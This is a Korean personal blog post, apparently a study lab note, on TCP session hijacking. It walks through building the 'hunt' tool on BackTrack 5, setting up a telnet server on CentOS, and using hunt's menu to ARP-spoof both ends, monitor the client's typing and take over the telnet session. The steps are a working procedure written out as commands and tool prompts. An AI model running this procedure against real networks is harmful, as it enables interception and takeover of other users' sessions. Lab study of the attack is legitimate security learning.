kkamagi's story

IT, 정보보안, 포렌식, 일상 공유

Cyber Security

Session hijacking

까마기 2015. 1. 22. 14:55
728x90
반응형
Session hijacking 
*Session hijacking - MITM 보단 구성하기가 까다롭고 성공하기 어렵다. TCP를 이용한 프로토콜에는 거의 적용. 성공할 수 있으나 자동화된 툴을 사용하지 않고서는 거의 불가능.
<BT5>
http://packetstormsecurity.org/
hunt-1.5.tgz

# cd ~
# tar zxvf hunt-1.5.tgz
# cd hunt-1.5
# make
# ./hunt //이프로그램은 기본적으로 eth0을 잡고 있기 때문에 eth0이 아니라면 설정을 같이 해준다.
./hunt -i eth3 (hunt 접속 한다음 텔넷 접속해야한다)

 

 

<Centos>
# yum install telnet-server
# vi /etc/xinetd.d/krb5-telnet


disable = no

 


# useradd usera
# passwd usera
# service xinetd start


<XP>
# telnet x.x.x.x(Centos ip)

 

<BT5>
l (list connection) 세션 확인
a
choose conn> 0
arp spoof src in dst y/n [y]> y
src MAC [EA:1A:DE:AD:BE:01]> 
arp spoof dst in src y/n [y]> y
dst MAC [EA:1A:DE:AD:BE:02]> 
input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]> r
dump connectin y/n [y]> 
dump [s]rc/[d]st/[b]oth [b]> d

 

클라이언트가 타이핑 하는것을 모니터링 가능함
ctrl+c 키를 누르면 <Session Hijacking>

클라이언트에서 다시 타이핑 하면 서버와 연결이 끊어져 버림
다시 BT에서 엔터를 치면 세션이 넘어옴!!!


공격자에서 ctrl c 누르면 RST가 나간다.

 

 


반응형